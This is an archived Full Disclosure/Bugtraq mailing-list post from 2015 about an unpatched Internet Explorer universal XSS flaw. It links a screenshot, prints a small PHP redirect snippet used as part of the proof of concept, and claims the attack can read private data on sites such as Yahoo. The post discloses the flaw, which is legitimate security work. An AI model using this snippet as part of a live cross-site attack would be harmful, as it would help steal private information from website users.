[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"

To: bugtraq@xxxxxxxxxxxxxxxxx, fulldisclosure@xxxxxxxxxxxx
Subject: Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"
From: David Leo <david.leo@xxxxxxxxxxxx>
Date: Thu, 05 Feb 2015 15:31:41 +0800

1.
"Spartan - vulnerable (Windows 10)"
http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png
Thanks to Zaakiy Siddiqui!

2.
<?php
sleep(2);
header("Location: http://www.dailymail.co.uk/robots.txt";);
?>
Many asked for it.

3.
It's Universal XSS, as we tested:
Not only dailymail.co.uk - also Yahoo etc
Not only injecting content - also getting private info etc.

Kind Regards,

Prev by Date: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
Next by Date: RE: [FD] Major Internet Explorer Vulnerability - NOT Patched
Previous by thread: Cisco Security Advisory: Cisco Security Advisory Cisco WebEx Meetings Server Command Injection Vulnerability
Next by thread: CVE-2015-1172 Wordpress-theme remote arbitrary code
Index(es):
- Date
- Thread